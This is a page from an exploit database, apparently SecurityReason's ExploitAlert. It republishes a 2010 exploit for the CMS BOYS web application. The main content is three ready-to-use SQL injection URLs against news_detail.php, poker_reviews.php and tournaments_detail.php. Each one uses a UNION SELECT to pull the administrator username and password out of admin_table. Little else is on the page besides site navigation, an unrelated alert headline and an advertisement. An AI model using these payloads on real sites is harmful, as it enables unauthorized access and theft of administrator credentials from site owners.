|
 |
| SecurityReason | ||
| WLB | ||
| Services | ||
| RSS | ||
| Corporate | ||
| Note | ||
If you have found a vulnerability, please send to our SecurityAlert Database : |
||
Home  ExploitAlert Database |
||
ExploitAlert : 7755 Credit : MizoZ Date : 02.02.2010 Exploit Code : /* Name : CMS BOYS (id) Multiple SQL Injection WebSite : http://www.cmsboys.com/ Demo : http://www.cmsboys.com/democms/ Author : Hamza 'MizoZ' N. Email : mizozx@gmail.com Greetz : Zuka , PR0f.SELLIM , Dyle , Achille Dark3r , geeksec.com */ # 1st : File : news_detail.php , GET : id [HOST]/[PATH]/news_detail.php?id=[INJECTION] Exploit : [HOST]/[PATH]/news_detail.php?id=-15+union+select+1,2,3,4,concat(admin_user name,0x3a,admin_password) +from+admin_table-- # 2nd : File : news_detail.php , GET : id [HOST]/[PATH]/poker_reviews.php?id=[INJECTION] Exploit : [HOST]/[PATH]/poker_reviews.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,10,con cat (admin_username,0x3a,admin_password),12,13+from+admin_table-- # 3th : File : tournaments_detail.php , GET : id [HOST]/[PATH]/tournaments_detail.php?id=[INJECTION] Exploit : [HOST]/[PATH]/tournaments_detail.php?id=-1+union+select+1,2,3,4,5,6,7,8,9,c oncat (admin_username,0x3a,admin_password)+from+admin_table--  Feedback : If you have additional information or notice any errors regarding this exploit, please use contact form or email us at exploit()securityreason()com. |
||
| Alert | ||
Allow attacker to denial of service apache 2.2.17 server |
||
| Apache |  |
|
| PHP | |
|
» libzip 0.9.3 |
||
| ADT | ||
Protect your family and valuables with Home Security Systems |
||
- 2011-05-13| Copyright © SecurityReason.com. All Rights Reserved. |